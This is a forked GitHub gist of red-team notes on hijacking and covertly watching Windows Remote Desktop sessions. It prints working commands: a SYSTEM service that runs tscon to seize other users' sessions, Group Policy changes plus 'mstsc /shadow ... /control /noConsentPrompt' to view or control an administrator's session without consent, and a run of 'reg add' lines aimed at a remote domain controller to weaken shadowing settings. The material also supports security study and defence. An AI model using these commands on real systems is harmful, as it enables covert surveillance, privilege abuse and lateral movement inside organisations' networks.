Skip to content

Instantly share code, notes, and snippets.

@PowerPress
Forked from bohops/RDP_Eavesdropping_Hijacking
Created December 29, 2020 20:56
Show Gist options
  • Save PowerPress/28c3b4903459c00362ebf29710c183ec to your computer and use it in GitHub Desktop.
Save PowerPress/28c3b4903459c00362ebf29710c183ec to your computer and use it in GitHub Desktop.
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
that is not very new...
===========
Inspiration
===========
As you may already know...
TSCON, amongst a few other tricks, is a nice way to hijack RDP sessions (even disconnected sessions) on the same box by executing the
command as SYSTEM like so:
sc.exe create hijackservice binpath= “cmd.exe /k tscon <#id> /dest:rdp-tcp#<num>”
sc.exe start hijackservice
Source ->[https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6]
(^Great write-up and well worth the read)
===============
Another Fun Way
===============
Let’s say that you own a server, a few servers, or the domain for that matter, but you really haven’t found a way to achieve your
ultimate Red Team goal. As “admin” (with a few caveats), you possess the ability to influence (local) Group Policy. With this power,
you can set Group Policy to “shadow” other *active* Remote Desktop/Terminal Server sessions. In other words, you can eavesdrop
(watch what the admin does) or completely take control of the session similar to TSCON. Here are the basic steps…
1) Influence domain group policy (gpmc.msc) or local group policy (gpedit.msc)
2) Drill down to this path...
Computer Configuration > Windows Settings > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host
3) Select “Set rules for Remote control of Remote Desktop Services user sessions”
4) Select Enable, Options, “Full Control without users permission”, Apply, OK
*You could also select “View Session without user’s permission” if you only want to eavesdrop
5) Wait a few minutes or force a group policy update
Gpupdate /force
6) Attempt to connect to the remote session with shadow.exe (if you can find it) or use qwinsta/mstsc like so…
Qwinsta /server:<target> //to get session
mstsc /shadow:<session> /v:<target> /control /noConsentPrompt
7) Grab popcorn and wait until the admin is no longer moving the cursor :-)
================
Some Other Notes
================
- This method has a lot of overhead, but the ability to observe is a powerful thing
- I read somewhere that this may not work on Server 2012 but was re-introduced in Server 2012 R2.
(I *assume* that this will work for previous versions in some way and 2012 R2 forward.)
- I tried to get this to work without the Group Policy via Registry manipulation but failed miserably
(I observed Access Denied Errors telling me the Group Policy wasn’t enabled...which was quite true)
- If you think you can find a way to get ^ to work, start here:
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
- Thanks for taking the time to read this unorganized gist – Good Luck!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment